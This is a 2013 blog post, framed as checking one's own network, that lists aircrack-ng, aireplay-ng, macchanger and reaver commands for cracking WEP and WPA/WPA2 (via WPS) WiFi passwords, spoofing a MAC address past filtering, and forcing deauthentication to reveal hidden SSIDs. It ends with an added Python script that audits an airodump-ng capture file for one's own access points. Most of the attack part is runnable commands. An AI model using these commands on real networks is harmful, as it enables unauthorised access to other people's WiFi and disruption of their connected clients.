16 January 2013

Is your WiFi secure?

Have you ever doubted your WiFi security? You may think your WiFi is secure just because you chose a humongous password, or a password with special characters in it, and you assume you are safe.
You are wrong. Even though you have secured your network, it might not be as secure as you imagine, no matter which network encryption you are using: WEP, WPA or WPA2. Anyone can easily follow the instructions below and crack your WiFi password.

You need a special modem (more information here) and a BackTrack Linux distribution (or just kismet for the last two approaches) for this. If you have time, I suggest you follow these instructions and find out whether your WiFi is secure or not. If you end up with the password for your network, it is not as secure as you thought, and you had better think of ways to secure it.

WEP

This is a short list of commands from Lifehacker on how to crack your WEP WiFi password.

Change mac address (Stop/Change/Start)
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
Look up networks
  • airodump-ng wlan0
Capture information in a file
  • airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
Association
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • you must get Association Successful to continue
Creating router traffic
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • look for the data# the higher the better
Crack the code
  • aircrack-ng -b (bssid) (file name-01.cap)
  • it gives you the key in double digit formats like 11:22:33:..

WPA/WPA2

These are instructions from Lifehacker on how to crack your WPA/WPA2 WiFi password.

Connect to a Network
  • Click Applications > Internet > Wicd Network Manager
  • Connect to a network, enter your password if necessary. This step is needed to download Reaver.
Get Reaver
  • Open Terminal 
  • apt-get update 
  • apt-get install reaver 
Find your interface
  • iwconfig
Change mac address
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
Start Interface
  • airmon-ng start wlan0 
Look up networks
  • airodump-ng wlan0 
Crack the code
  • reaver -i mon0 -b (bssid) -vv 

MAC filtering/Whitelist MAC filtering



SSID Hiding / MAC filtering

This is a summary of the instructions on Synjunkie.

Find WiFi setting
  • kismet
Join network
  • iwconfig eth1 essid batman
Obtain an IP address
  • dhclient eth1
  • (if this fails, there is MAC filtering; if not, you have joined the network at this point)
Look for valid MAC address
  • kismet
Force MAC address to disconnect
  • aireplay-ng to force a disconnection
Turning off promiscuous mode
  • ifconfig eth1 -promisc
Change MAC address
  • ifconfig eth1 down
  • ifconfig eth1 hw ether 00:16:6F:4D:AE:8C
  • ifconfig eth1 up
  • iwconfig eth1 essid batman
Request an IP address
  • dhclient eth1
Test

  • ping www.yahoo.com

SSID Hiding


Get list of networks
  • airodump-ng wlan1
  • airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1
  • aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1
SSID revealed
  • If it does not work the first time try aireplay-ng again until it works. 
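
To check your own access points against the weaknesses covered above, the CSV that airodump-ng writes next to the capture file when -w is used can be audited with a short script. This Python is an added example, not code from the original post or from the guides it summarises; the audit function name, the sample rows and the BSSIDs are constructed for illustration. The WPA/WPA2 finding relies on the fact that Reaver works by guessing the router's WPS PIN, which the CSV does not report, so it is flagged for a manual check.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to "<file name>-01.csv":
# access point table, blank line, then station table. All values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2013-01-16 10:00:00, 2013-01-16 10:05:00,  1,  54, WEP, WEP, , -40, 120, 900,   0.  0.  0.  0,   7, oldwifi,
00:11:22:33:44:02, 2013-01-16 10:00:00, 2013-01-16 10:05:00,  6,  54, WPA2, CCMP, PSK, -52, 118, 12,   0.  0.  0.  0,   0, ,
00:11:22:33:44:03, 2013-01-16 10:00:00, 2013-01-16 10:05:00, 11,  54, WPA2, CCMP, PSK, -60, 115, 4,   0.  0.  0.  0,   6, batman,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:00:00:01, 2013-01-16 10:01:00, 2013-01-16 10:04:00, -45, 30, 00:11:22:33:44:03, batman
"""


def audit(csv_text, my_bssids):
    """Return {bssid: [findings]} for the access points listed in my_bssids."""
    mine = {b.upper() for b in my_bssids}
    findings = {}
    for row in csv.reader(io.StringIO(csv_text)):
        cells = [c.strip() for c in row]
        if cells and cells[0] == "Station MAC":
            break  # the station table follows; the AP table is finished
        if len(cells) < 15 or cells[0] == "BSSID" or cells[0].upper() not in mine:
            continue  # blank line, header, short row, or someone else's AP
        privacy = cells[5].upper().split()
        # An ESSID may contain commas: it is everything between ID-length and Key.
        essid = ",".join(row[13:-1]).strip().strip("\x00")
        notes = []
        if "WEP" in privacy:
            notes.append("WEP: key recoverable from captured traffic, move to WPA2")
        if any(p.startswith("WPA") for p in privacy):
            notes.append("WPA/WPA2: confirm WPS is disabled in the router settings")
        if not essid:
            notes.append("hidden SSID: revealed when a client reconnects, not a control")
        findings[cells[0].upper()] = notes
    return findings


if __name__ == "__main__":
    own = ["00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:03"]
    for bssid, notes in audit(SAMPLE_CSV, own).items():
        print(bssid, "->", "; ".join(notes))
```

MAC filtering is not visible in a scan, so it does not appear in the findings; treat it like SSID hiding, as something that does not replace strong encryption.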
